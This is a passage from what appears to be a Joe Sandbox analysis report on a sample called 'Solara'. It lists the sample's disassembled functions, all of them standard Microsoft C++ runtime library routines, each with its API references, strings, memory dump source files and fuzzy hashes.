Instruction ID: 15d47d89ddbc15aed9079ded27e22041831ce8df495186332ce31dc00e2e7ccc
Opcode Fuzzy Hash: 7daaa911a27e3b3ee2392d4b1ebc075e007a8eb1f51e8f83cfbaf60aaaeb4104
Instruction Fuzzy Hash: B301D679D102299BCF05EBA4E816AAE7771AF84320F144408E911A7391CF349E469B90

Function 00C3D2E9 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D2F0
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D2FA
int.LIBCPMT ref: 00C3D311

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D34B
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D36B
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D378

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: bfc7dcaa73de94a1860cdb07487eacf4ce158356c5a819fdb6e1787c8fbac069
Instruction ID: fab49949d07b3285de5bf6bcacab2908c85ff3924d5393dad32b0eae07a6ff07
Opcode Fuzzy Hash: bfc7dcaa73de94a1860cdb07487eacf4ce158356c5a819fdb6e1787c8fbac069
Instruction Fuzzy Hash: D501C0359002299BCB04EB64F852AAE77B2FF84320F244008F911AB7E1CF349E429B91

Function 00C3D254 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D25B
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D265
int.LIBCPMT ref: 00C3D27C

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D2B6
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D2D6
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D2E3

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: b0592f85b6fa7e403ca1a679892a3df206625d825990fafad6a5056a10325f11
Instruction ID: 7a1630b300195768847929a9f68c4569e9eb747eb4dcc53c52c40297d0633315
Opcode Fuzzy Hash: b0592f85b6fa7e403ca1a679892a3df206625d825990fafad6a5056a10325f11
Instruction Fuzzy Hash: B801D235D0022A9BCF05EFA4E811BBEB776AF84310F184409E911AB391CF349E42DB90

Function 00C3D37E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3D385
std::_Lockit::_Lockit.LIBCPMT ref: 00C3D38F
int.LIBCPMT ref: 00C3D3A6

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C3D3E0
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3D400
Concurrency::cancel_current_task.LIBCPMT ref: 00C3D40D

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8577843653bf1b102f2a7b7e80ef5e4d4a51169d5a48dbfbbfd4aa3247c8dbda
Instruction ID: d0dd48e48b2f34f782a3a5d4a654748640e79230876c16cee10e525f764be255
Opcode Fuzzy Hash: 8577843653bf1b102f2a7b7e80ef5e4d4a51169d5a48dbfbbfd4aa3247c8dbda
Instruction Fuzzy Hash: CA01D23590022AABCB05FB64F815ABDB776BF84324F140408E911AB3A1CF349E46AB91

Function 00C29DDE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C29DE5
std::_Lockit::_Lockit.LIBCPMT ref: 00C29DEF
int.LIBCPMT ref: 00C29E06

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C29E40
std::_Lockit::~_Lockit.LIBCPMT ref: 00C29E60
Concurrency::cancel_current_task.LIBCPMT ref: 00C29E6D

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4f12341c628df4165ca6162aea7951f7dc03f3c3a8f0c1385a68007a00f26fbf
Instruction ID: 70e8e885bce2d24a746fa6a5d6f8d9957e3ca3de1822e2c7f5c388c994c907af
Opcode Fuzzy Hash: 4f12341c628df4165ca6162aea7951f7dc03f3c3a8f0c1385a68007a00f26fbf
Instruction Fuzzy Hash: BA01D6359003359BCF04EB64E811ABE7775FF85724F254408EA11A7791CF709E81D791

Function 00C29D49 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C29D50
std::_Lockit::_Lockit.LIBCPMT ref: 00C29D5A
int.LIBCPMT ref: 00C29D71

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C29DAB
std::_Lockit::~_Lockit.LIBCPMT ref: 00C29DCB
Concurrency::cancel_current_task.LIBCPMT ref: 00C29DD8

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 4882b49d614b823749e3c730abd6aad51181c00ae5fc6fb65e9d6afb56114c86
Instruction ID: d824abf86dc09f1ce6f0835e35e0e414995b7c055b7c3664fa8ea70e7f57d721
Opcode Fuzzy Hash: 4882b49d614b823749e3c730abd6aad51181c00ae5fc6fb65e9d6afb56114c86
Instruction Fuzzy Hash: 6E01C035940339ABCB05EB64E811AEEB7B2EF84320F144008E911ABB91CF709A42E791

Function 00C856DB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00D1182A,00000104), ref: 00C85738

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00C857CD
Runtime Error!Program: , xrefs: 00C85704
..., xrefs: 00C85786
<program name unknown>, xrefs: 00C85747

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 4bf8b5fa81d7a8667c7d32d91d6c16258a003511760fd58534a4c42317efa77b
Instruction ID: d292c4888829107cd15404201841b58b2128da1910f2d645311d38dcc565e617
Opcode Fuzzy Hash: 4bf8b5fa81d7a8667c7d32d91d6c16258a003511760fd58534a4c42317efa77b
Instruction Fuzzy Hash: 41212966A40706B7DA2536615C8EEAB379C8B91B5CF044031FD1A92681FAA1CF06C3E9

Function 00C415EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C415F6
_Getvals.LIBCPMT ref: 00C41653
_Mpunct.LIBCPMT ref: 00C4168E
_Mpunct.LIBCPMT ref: 00C416A8

Strings

$+xv, xrefs: 00C416B3

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 8a179c5a753a1a4fe25cd92d4b5999025e5ed7c56337e85651b3bc622489a3e5
Instruction ID: a37e985c2b3a367361422bdb0c2f8ced2e864bb6d5d8d4f69b29ae19c71f27c6
Opcode Fuzzy Hash: 8a179c5a753a1a4fe25cd92d4b5999025e5ed7c56337e85651b3bc622489a3e5
Instruction Fuzzy Hash: D921A2B1804B55AFDB25DF74C840BABBBF8BB09700F08065AF8A9C7A41D770E645DB90

Function 00C86E40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00CA880C,000000FF,?,00C86DC7,00C86F16,?,00C86D9B,00000000), ref: 00C86E75
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C86E87
FreeLibrary.KERNEL32(00000000,?,?,00000000,00CA880C,000000FF,?,00C86DC7,00C86F16,?,00C86D9B,00000000), ref: 00C86EA9

Strings

CorExitProcess, xrefs: 00C86E7F
mscoree.dll, xrefs: 00C86E6E

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dd80a1c9e82338921baf06a3cb51b45b4ede1668ee1806081b3d10e2424bf3e6
Instruction ID: 93ccda4cc7d722245a350669c6343f1eb492191f84cd24b7d6ecbca9e54f173f
Opcode Fuzzy Hash: dd80a1c9e82338921baf06a3cb51b45b4ede1668ee1806081b3d10e2424bf3e6
Instruction Fuzzy Hash: B901623594461AAFDB119F90DC0AFAFBBB9FB46B59F000535E822A36D0DB749900CB94

Function 00C8B99D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00C8B956), ref: 00C8B9AC
GetLastError.KERNEL32(?,00C8B956), ref: 00C8B9B6
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00C8B9F4

Strings

ext-ms-, xrefs: 00C8B9D9
api-ms-, xrefs: 00C8B9C3

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: b1cccc9bf639c20b4b30cc4cd8695f16cd810193dce81bfeffd802e27a3184e7
Instruction ID: 37017bcbfe4fb319f0a7f39709c0ee303889386bf44164b4cc2bd60abd8a4d84
Opcode Fuzzy Hash: b1cccc9bf639c20b4b30cc4cd8695f16cd810193dce81bfeffd802e27a3184e7
Instruction Fuzzy Hash: 9AF01C31680205B6EF203B62DC0BB5D3E759B12B98F144020FA1CA81E2EB71DE549789

Function 00C5A733 Relevance: 7.7, APIs: 5, Instructions: 178COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00C5A79E
operator+.LIBVCRUNTIME ref: 00C5A7EE
shared_ptr.LIBCMT ref: 00C5A8BA
DName::DName.LIBVCRUNTIME ref: 00C5A8EA
operator+.LIBVCRUNTIME ref: 00C5A94B

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: operator+shared_ptr$NameName::
String ID:
API String ID: 2894330373-0
Opcode ID: 9c5bad8e116d4c758066a381f16367c4957fe9cd0ca82c6dd7d343a279750a94
Instruction ID: f484e1fb33593beb860b57424b9bafab153714eed492a158061c0fe5627f5bde
Opcode Fuzzy Hash: 9c5bad8e116d4c758066a381f16367c4957fe9cd0ca82c6dd7d343a279750a94
Instruction Fuzzy Hash: 966192BC80420AEFCB14CFA6C8449E97BB5FB08345F14C359E8159B251E732978ADF5A

Function 00C22C51 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C22C5D
int.LIBCPMT ref: 00C22C70

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C22CA3
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22CB9
Concurrency::cancel_current_task.LIBCPMT ref: 00C22CC4

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6906ee6341b37490987d9ee807ebd1d4037180026302d19978e623f016f1373d
Instruction ID: 0173c26bb94025c3b5d05c373daca1bde337b0e2f8da54ecae3faa645d3ccfb5
Opcode Fuzzy Hash: 6906ee6341b37490987d9ee807ebd1d4037180026302d19978e623f016f1373d
Instruction Fuzzy Hash: C001F732900234BBDB19FB54F8158ADB769DF90360F244109F81197690DF309F829790

Function 00C23C2E Relevance: 7.5, APIs: 5, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C23C3A
int.LIBCPMT ref: 00C23C4D

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

std::_Facet_Register.LIBCPMT ref: 00C23C80
std::_Lockit::~_Lockit.LIBCPMT ref: 00C23C96
Concurrency::cancel_current_task.LIBCPMT ref: 00C23CA1

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 598b107570ad918f6c053c458ce87d3597e2dbe470ebfb53e91f3a19293e0397
Instruction ID: f4471824b3d1c00b73c1a4ecd564139eb9b3a65b1d71b8739b81db4618209047
Opcode Fuzzy Hash: 598b107570ad918f6c053c458ce87d3597e2dbe470ebfb53e91f3a19293e0397
Instruction Fuzzy Hash: 8901F732500134ABCB18FBA4F8558ED7769DF80720B144119F812A7690DF34DF429B90

Function 00C266B7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C266BE
std::_Lockit::_Lockit.LIBCPMT ref: 00C266C9
std::_Lockit::~_Lockit.LIBCPMT ref: 00C26737

Part of subcall function 00C2684A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C26862

std::locale::_Setgloballocale.LIBCPMT ref: 00C266E4
_Yarn.LIBCPMT ref: 00C266FA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: d34dc8d0687e1e878d598905efe33937f23d7cec9e28f2020d84ee14e68d5237
Instruction ID: 16ac2eab54464eb21dfd92f90831aab69611e7f6ae942c77681730fc01028fb5
Opcode Fuzzy Hash: d34dc8d0687e1e878d598905efe33937f23d7cec9e28f2020d84ee14e68d5237
Instruction Fuzzy Hash: 7401DF79A002619BCB09EF20E846ABD7B71FF85754B04805DE9115B781CF346E43DFA1

Function 00C83E35 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00C83FB5
__freea.LIBCMT ref: 00C83FD1

Strings

am/pm, xrefs: 00C84035
a/p, xrefs: 00C84099

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: fdfeb5e1654b8ab8a91f4f87da5d695cf2769b3d58e00125a81c5c5012edd55c
Instruction ID: ac70c6db35b0cc02435af2f35a65ab3bc98cc312070084d462418eb7732a81e9
Opcode Fuzzy Hash: fdfeb5e1654b8ab8a91f4f87da5d695cf2769b3d58e00125a81c5c5012edd55c
Instruction Fuzzy Hash: 69C1F575904217DBCB28BFA9C889BBAB7B0FF15708F144189F921AB250D3359F41CB99

Function 00C550DB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00C55100
CatchIt.LIBVCRUNTIME ref: 00C551E6

Strings

RCC, xrefs: 00C5511A
MOC, xrefs: 00C55112

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: c7baf4456ac9afced228af9a1674e310aa53e44d86d227902d0edc8fc43ceca7
Instruction ID: bd8dd578763678ef63fcac01854973f8624fdf1fce9ced65acc470de4403c70a
Opcode Fuzzy Hash: c7baf4456ac9afced228af9a1674e310aa53e44d86d227902d0edc8fc43ceca7
Instruction Fuzzy Hash: BA417935900609EFCF15CF98CC81AAEBBB5FF48305F158059FD2567221D3359A94DB54

Function 00C41519 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C41520

Part of subcall function 00C398E0: _Maklocstr.LIBCPMT ref: 00C39900
Part of subcall function 00C398E0: _Maklocstr.LIBCPMT ref: 00C3991D
Part of subcall function 00C398E0: _Maklocstr.LIBCPMT ref: 00C3993A

_Mpunct.LIBCPMT ref: 00C415B8
_Mpunct.LIBCPMT ref: 00C415D2

Strings

$+xv, xrefs: 00C415DD

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Maklocstr$Mpunct$H_prolog3
String ID: $+xv
API String ID: 4259326447-1686923651
Opcode ID: 4a36a1726eb8516d304ea06af718665f2847c78287ee958edd3cbde456da2458
Instruction ID: 9229b4e7423ce4416d0a7ee884f630f1ec1c27dded473b719574eadbd665b655
Opcode Fuzzy Hash: 4a36a1726eb8516d304ea06af718665f2847c78287ee958edd3cbde456da2458
Instruction Fuzzy Hash: 972182B1904B556EDB25DF74C840B6BBBF8BB0D300F04495AE899C7A41D770E645DB90

Function 00C4BEBC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4BEC3
_Mpunct.LIBCPMT ref: 00C4BF5B
_Mpunct.LIBCPMT ref: 00C4BF75

Strings

$+xv, xrefs: 00C4BF80

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 6e44c7fe0423558a6dc6e1d3e966baf75f6621292fdd1c481d5f47b569d1ea96
Instruction ID: 3edb7687048cfd31cb4e0e3c4cb69086ff18bd1ce70bfe244705f5057e3ca40d
Opcode Fuzzy Hash: 6e44c7fe0423558a6dc6e1d3e966baf75f6621292fdd1c481d5f47b569d1ea96
Instruction Fuzzy Hash: 902180B1904B56AEDB25DFB4C88076BBAF8BB09301F04465AE459C7A41D770EA06DF90

Function 00C50F07 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 00C50F9B

Strings

MOC, xrefs: 00C50F19
csm, xrefs: 00C50F21
RCC, xrefs: 00C50F11

Memory Dump Source

